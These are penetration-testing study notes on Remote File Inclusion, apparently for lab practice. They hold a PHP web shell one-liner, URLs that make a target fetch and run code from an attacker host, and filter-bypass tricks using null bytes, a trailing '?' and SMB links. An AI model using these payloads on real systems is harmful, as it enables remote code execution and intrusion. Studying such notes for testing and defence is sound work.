RFI - Remote File Inclusion

See PG Practice SLORT for uploading a php reverse shell that executes simultaneously in windows!

https://securityxploded.com/remote-file-inclusion.php

Less common than LFI because it has to be configured to be able to call remotely, however ALWAYS CHECK IT if you found a LFI.

Test payload:

http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt

Result would be an incoming connection on a nc listener.

Exploiting:

Host the file with malicious php code:

kali@kali:/var/www/html$ cat evil.txt
<?php echo shell_exec($_GET['cmd']); ?>
kali@kali:/var/www/html$ sudo systemctl restart apache2

Call it with the RFI payload:

http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt&cmd=ipconfig

Tricks:

  • Add null byte to terminate string and bypass upload restriction of filetype - %00

  • Append a ? to the end of the payload to continue the string as if there isn't a payload

  • If http is excluded, try SMB link instead

Last updated